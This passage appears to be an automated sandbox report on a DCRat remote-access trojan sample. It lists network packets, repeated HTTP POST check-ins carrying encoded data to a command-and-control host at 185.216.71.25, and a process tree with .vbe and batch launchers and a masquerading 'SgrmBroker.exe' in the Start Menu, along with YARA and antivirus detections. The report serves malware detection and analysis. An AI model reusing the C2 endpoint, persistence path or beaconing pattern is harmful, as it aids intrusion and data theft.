                                    Jan 3, 2025 09:10:11.726764917 CET8049746185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:10:12.069082975 CET4974680192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:12.073851109 CET8049746185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:10:33.122565985 CET8049746185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:10:33.122778893 CET4974680192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:33.136131048 CET4974680192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:33.140978098 CET8049746185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:10:38.017051935 CET4936953192.168.2.6162.159.36.2
                                    Jan 3, 2025 09:10:38.021914005 CET5349369162.159.36.2192.168.2.6
                                    Jan 3, 2025 09:10:38.022180080 CET4936953192.168.2.6162.159.36.2
                                    Jan 3, 2025 09:10:38.026983023 CET5349369162.159.36.2192.168.2.6
                                    Jan 3, 2025 09:10:38.487267971 CET4936953192.168.2.6162.159.36.2
                                    Jan 3, 2025 09:10:38.492316008 CET5349369162.159.36.2192.168.2.6
                                    Jan 3, 2025 09:10:38.492372990 CET4936953192.168.2.6162.159.36.2
                                    Jan 3, 2025 09:10:39.174319029 CET4937780192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:39.179143906 CET8049377185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:10:39.179214954 CET4937780192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:39.185646057 CET4937780192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:39.190401077 CET8049377185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:10:39.540816069 CET4937780192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:39.545636892 CET8049377185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:00.557622910 CET8049377185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:00.557774067 CET4937780192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:00.564135075 CET4937780192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:00.568950891 CET8049377185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:10.932816982 CET4943080192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:10.938052893 CET8049430185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:10.938163042 CET4943080192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:10.938472986 CET4943080192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:10.944188118 CET8049430185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:11.287338972 CET4943080192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:11.292490959 CET8049430185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:32.304397106 CET8049430185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:32.304488897 CET4943080192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:32.310494900 CET4943080192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:32.315294981 CET8049430185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:38.220307112 CET4943180192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:38.226095915 CET8049431185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:38.226217031 CET4943180192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:38.226459026 CET4943180192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:38.231234074 CET8049431185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:38.584213972 CET4943180192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:38.589014053 CET8049431185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:59.621268034 CET8049431185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:11:59.621339083 CET4943180192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:59.627343893 CET4943180192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:11:59.632116079 CET8049431185.216.71.25192.168.2.6

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 3, 2025 09:10:38.015290022 CET5352658162.159.36.2192.168.2.6
                                    Jan 3, 2025 09:10:38.660548925 CET53619631.1.1.1192.168.2.6

                                    HTTP Request Dependency Graph

                                    • 185.216.71.25

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649746185.216.71.25807160C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 3, 2025 09:10:11.722014904 CET286OUTPOST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 185.216.71.25
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Jan 3, 2025 09:10:12.069082975 CET344OUTData Raw: 00 06 01 00 06 0c 04 00 05 06 02 01 02 0c 01 06 00 05 05 0b 02 03 03 09 00 01 0c 0d 07 04 00 06 0d 02 06 59 07 04 06 51 0c 51 02 0a 04 04 07 54 05 02 0c 5b 0d 55 05 04 01 02 06 03 04 52 05 58 01 07 0f 01 04 07 05 06 0c 05 0c 00 0d 51 0e 04 02 00
                                    Data Ascii: YQQT[URXQQ\L~|Nzw\[Bv[oR|oewU`|sh{|pZx^TD|}sSwdh}O~V@{mnL~Lu


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.649377185.216.71.25801488C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 3, 2025 09:10:39.185646057 CET321OUTPOST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 185.216.71.25
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Jan 3, 2025 09:10:39.540816069 CET344OUTData Raw: 00 06 01 07 03 08 04 07 05 06 02 01 02 0c 01 05 00 06 05 0c 02 03 03 09 03 02 0f 00 04 53 03 52 0f 01 04 01 07 03 04 57 0f 53 05 0a 00 03 06 0e 05 05 0d 0d 0d 02 04 02 05 57 03 05 04 0a 00 0c 00 56 0a 0f 07 02 04 07 0c 57 0b 01 0c 03 0b 03 04 07
                                    Data Ascii: SRWSWVWWQP\L}Rh^~Nw\}Ov\kP~obX`BZ~shoRlNbI}mh@tIxN~_~V@{Sb~Lu


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.649430185.216.71.25801864C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 3, 2025 09:11:10.938472986 CET286OUTPOST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 185.216.71.25
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Jan 3, 2025 09:11:11.287338972 CET344OUTData Raw: 05 05 01 05 06 0c 01 0a 05 06 02 01 02 0c 01 02 00 00 05 09 02 07 03 0b 07 06 0d 57 06 57 01 55 0f 0e 05 0b 03 54 05 05 0d 03 07 57 06 06 05 53 05 00 0e 01 0e 05 04 52 07 03 04 53 04 51 07 01 03 06 0d 0b 07 54 01 06 0e 52 0c 55 0c 07 0d 09 04 03
                                    Data Ascii: WWUTWSRSQTRU_WTT\L~@h^~cb_BaepkUuMvlxMUYx`^oYfKknh`Y^}e~V@xmzN}L}


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.649431185.216.71.25805372C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 3, 2025 09:11:38.226459026 CET321OUTPOST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 185.216.71.25
                                    Content-Length: 336
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Jan 3, 2025 09:11:38.584213972 CET336OUTData Raw: 05 07 01 00 06 08 04 00 05 06 02 01 02 05 01 01 00 0b 05 0e 02 04 03 0a 00 03 0d 0c 07 03 01 00 0e 03 05 0b 01 00 04 0b 0e 51 02 04 07 05 06 06 07 04 0f 0f 0e 05 04 07 07 02 06 06 05 04 05 0c 02 50 0d 0f 07 01 05 01 0d 06 0b 0e 0e 03 0b 08 04 05
                                    Data Ascii: QPT]WPP\L~A~pf@wq}LvetABz^wB{]hZ|J{RQo^zKhSwScgx~e~V@Az}nA}_y


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:03:09:53
                                    Start date:03/01/2025
                                    Path:C:\Users\user\Desktop\onlysteal.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\onlysteal.exe"
                                    Imagebase:0x230000
                                    File size:1'011'382 bytes
                                    MD5 hash:8F81AC89B9F6DBCCF07A86AF59FAA6BA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:03:09:53
                                    Start date:03/01/2025
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe"
                                    Imagebase:0x4f0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:03:09:59
                                    Start date:03/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:03:09:59
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:03:09:59
                                    Start date:03/01/2025
                                    Path:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Intorefnet/hyperBlockCrtCommon.exe"
                                    Imagebase:0xc80000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 83%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping -n 10 localhost
                                    Imagebase:0x7ff7a8c20000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:03:10:10
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0x120000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 83%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\w32tm.exe
                                    Wow64 process (32bit):false
                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Imagebase:0x7ff784b20000
                                    File size:108'032 bytes
                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:03:10:37
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0xee0000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping -n 10 localhost
                                    Imagebase:0x7ff7a8c20000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:03:11:09
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0x4b0000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:03:11:31
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:03:11:31
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:03:11:31
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:03:11:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\w32tm.exe
                                    Wow64 process (32bit):false
                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Imagebase:0x7ff784b20000
                                    File size:108'032 bytes
                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:03:11:37
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0x9f0000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:9.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:9.3%
                                      Total number of Nodes:1512
                                      Total number of Limit Nodes:28
                                      execution_graph 25360 25f421 21 API calls __vsnwprintf_l 25361 24c220 93 API calls _swprintf 25363 231025 29 API calls 25410 24f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25411 24ff30 LocalFree 23479 25bb30 23480 25bb39 23479->23480 23482 25bb42 23479->23482 23483 25ba27 23480->23483 23503 2597e5 GetLastError 23483->23503 23485 25ba34 23523 25bb4e 23485->23523 23487 25ba3c 23532 25b7bb 23487->23532 23490 25ba53 23490->23482 23493 25ba96 23557 258dcc 23493->23557 23497 25ba91 23556 2591a8 20 API calls __dosmaperr 23497->23556 23499 25bada 23499->23493 23563 25b691 26 API calls 23499->23563 23500 25baae 23500->23499 23501 258dcc _free 20 API calls 23500->23501 23501->23499 23504 259801 23503->23504 23505 2597fb 23503->23505 23510 259850 SetLastError 23504->23510 23565 25b136 23504->23565 23564 25ae5b 11 API calls 2 library calls 23505->23564 23509 25981b 23512 258dcc _free 20 API calls 23509->23512 23510->23485 23514 259821 23512->23514 23513 259830 23513->23509 23515 259837 23513->23515 23516 25985c SetLastError 23514->23516 23573 259649 20 API calls _unexpected 23515->23573 23574 258d24 38 API calls _abort 23516->23574 23518 259842 23521 258dcc _free 20 API calls 23518->23521 23522 259849 23521->23522 23522->23510 23522->23516 23524 25bb5a ___scrt_is_nonwritable_in_current_image 23523->23524 23525 2597e5 _unexpected 38 API calls 23524->23525 23530 25bb64 23525->23530 23527 25bbe8 _abort 23527->23487 23530->23527 23531 258dcc _free 20 API calls 23530->23531 23577 258d24 38 API calls _abort 23530->23577 23578 25ac31 EnterCriticalSection 23530->23578 23579 25bbdf LeaveCriticalSection _abort 23530->23579 23531->23530 23580 254636 23532->23580 23535 25b7dc GetOEMCP 23537 25b805 23535->23537 23536 25b7ee 23536->23537 23538 25b7f3 GetACP 23536->23538 23537->23490 23539 258e06 23537->23539 23538->23537 23540 258e44 23539->23540 23541 258e14 _unexpected 23539->23541 23591 2591a8 20 API calls __dosmaperr 23540->23591 23541->23540 23542 258e2f RtlAllocateHeap 23541->23542 23590 257a5e 7 API calls 2 library calls 23541->23590 23542->23541 23544 258e42 23542->23544 23544->23493 23546 25bbf0 23544->23546 23547 25b7bb 40 API calls 23546->23547 23548 25bc0f 23547->23548 23551 25bc60 IsValidCodePage 23548->23551 23553 25bc16 23548->23553 23555 25bc85 __cftof 23548->23555 23550 25ba89 23550->23497 23550->23500 23552 25bc72 GetCPInfo 23551->23552 23551->23553 23552->23553 23552->23555 23602 24fbbc 23553->23602 23592 25b893 GetCPInfo 23555->23592 23556->23493 23558 258dd7 RtlFreeHeap 23557->23558 23562 258e00 __dosmaperr 23557->23562 23559 258dec 23558->23559 23558->23562 23683 2591a8 20 API calls __dosmaperr 23559->23683 23561 258df2 GetLastError 23561->23562 23562->23490 23563->23493 23564->23504 23570 25b143 _unexpected 23565->23570 23566 25b183 23576 2591a8 20 API calls __dosmaperr 23566->23576 23567 25b16e RtlAllocateHeap 23569 259813 23567->23569 23567->23570 23569->23509 23572 25aeb1 11 API calls 2 library calls 23569->23572 23570->23566 23570->23567 23575 257a5e 7 API calls 2 library calls 23570->23575 23572->23513 23573->23518 23575->23570 23576->23569 23578->23530 23579->23530 23581 254653 23580->23581 23582 254649 23580->23582 23581->23582 23583 2597e5 _unexpected 38 API calls 23581->23583 23582->23535 23582->23536 23584 254674 23583->23584 23588 25993a 38 API calls __fassign 23584->23588 23586 25468d 23589 259967 38 API calls __fassign 23586->23589 23588->23586 23589->23582 23590->23541 23591->23544 23593 25b977 23592->23593 23597 25b8cd 23592->23597 23596 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23593->23596 23599 25ba23 23596->23599 23609 25c988 23597->23609 23599->23553 23601 25ab78 __vsnwprintf_l 43 API calls 23601->23593 23603 24fbc4 23602->23603 23604 24fbc5 IsProcessorFeaturePresent 23602->23604 23603->23550 23606 24fc07 23604->23606 23682 24fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23606->23682 23608 24fcea 23608->23550 23610 254636 __fassign 38 API calls 23609->23610 23611 25c9a8 MultiByteToWideChar 23610->23611 23613 25c9e6 23611->23613 23621 25ca7e 23611->23621 23614 25ca07 __cftof __vsnwprintf_l 23613->23614 23616 258e06 __vsnwprintf_l 21 API calls 23613->23616 23618 25ca78 23614->23618 23620 25ca4c MultiByteToWideChar 23614->23620 23615 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23617 25b92e 23615->23617 23616->23614 23623 25ab78 23617->23623 23628 25abc3 20 API calls _free 23618->23628 23620->23618 23622 25ca68 GetStringTypeW 23620->23622 23621->23615 23622->23618 23624 254636 __fassign 38 API calls 23623->23624 23625 25ab8b 23624->23625 23629 25a95b 23625->23629 23628->23621 23630 25a976 __vsnwprintf_l 23629->23630 23631 25a99c MultiByteToWideChar 23630->23631 23632 25a9c6 23631->23632 23633 25ab50 23631->23633 23636 258e06 __vsnwprintf_l 21 API calls 23632->23636 23639 25a9e7 __vsnwprintf_l 23632->23639 23634 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23633->23634 23635 25ab63 23634->23635 23635->23601 23636->23639 23637 25aa30 MultiByteToWideChar 23638 25aa9c 23637->23638 23640 25aa49 23637->23640 23665 25abc3 20 API calls _free 23638->23665 23639->23637 23639->23638 23656 25af6c 23640->23656 23644 25aa73 23644->23638 23648 25af6c __vsnwprintf_l 11 API calls 23644->23648 23645 25aaab 23646 258e06 __vsnwprintf_l 21 API calls 23645->23646 23651 25aacc __vsnwprintf_l 23645->23651 23646->23651 23647 25ab41 23664 25abc3 20 API calls _free 23647->23664 23648->23638 23649 25af6c __vsnwprintf_l 11 API calls 23652 